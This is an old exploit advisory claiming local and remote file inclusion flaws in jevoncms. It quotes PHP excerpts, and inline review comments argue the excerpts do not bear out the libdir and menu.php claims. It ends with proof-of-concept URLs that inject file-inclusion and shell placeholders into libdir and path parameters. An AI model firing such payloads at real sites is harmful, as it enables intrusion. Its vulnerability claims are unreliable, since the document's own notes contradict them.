jevoncms - Local/Remote File Inclusion

EDB-ID:

12071

CVE:

N/A




Platform:

PHP

Date:

2010-04-05


########################################################
	jevoncms (LFI/RFI) Multiple Vulnerabilities
########################################################

[+]Title	:	jevoncms (libdir) Multiple Vulnerabilities
[+]Version:	-
[+]Download:	http://sourceforge.net/projects/jevoncms/files/
[+]Author:	eidelweiss
[+]Contact:	eidelweiss[at]cyberservices[dot]com	

	[!]Thanks To: all friends

########################################################

	-=[ Vuln C0de ]=-
***************************
[-] jevoncms/php/main/jevoncms.php

// NOTE(review): excerpt quoted from jevoncms/php/main/jevoncms.php.
// The include directory is assigned the literal "phplib/" on the line directly
// before it is used, so in the lines shown here the require() path is a constant
// and nothing from the request can change it between the assignment and the require.
// Whether any other code path sets $_PHPLIB["libdir"] from outside is not visible
// in this excerpt -- confirm against the full file before rating the finding.
$_PHPLIB["libdir"] = "phplib/"; 
require($_PHPLIB["libdir"] ."template.inc");      /* Disable this, if you are not using templates. */
// The remaining includes use fixed, literal relative paths.
// Hardening: anchor includes to the script's own directory (e.g. __DIR__) so they
// do not depend on the working directory or include_path.
require("template/jvc_template.php");
require("php/main/database/jvc_Database.php");

***************************
[-] jevoncms/php/main/template/jvc_template.php

// NOTE(review): excerpt quoted from jevoncms/php/main/template/jvc_template.php;
// the if-block is reproduced without its closing brace.
// $type and $lasttype are set outside this excerpt. If $type can be populated from
// the request (TODO confirm how it is assigned), its value reaches require() with
// no validation in the lines shown.
if($type!=$lasttype && $type!=''){
  // $path is overwritten here immediately before use, and always begins with "php/"
  // and ends with ".php"; the value that decides which file is loaded is $type.
  $path= "php/".$type."/".$type.".php" ;
 // echo $path;
  // Hardening: look $type up in a fixed allowlist of known module names (or reject
  // anything outside [A-Za-z0-9_]) before building the path, and fail closed otherwise.
  require($path);

***************************
[-] jevoncms/php/menu/menu.php

// NOTE(review): in the quoted menu.php line the require is commented out, so it executes
// nothing; this excerpt by itself does not show an include in menu.php that depends on libdir.
//require($_PHPLIB["libdir"] ."template.inc");      /* Disable this, if you are not using templates. */

***************************

	-=[ Proof Of Concept ]=-


	http://127.0.0.1/jevoncms/php/main/jevoncms.php?libdir=[lfi]

	http://127.0.0.1/jevoncms/php/main/template/jvc_template.php?path= [rfi shell]

	http://127.0.0.1/jevoncms/php/menu/menu.php?libdir=[lfi]

######################=[E0F]=#############################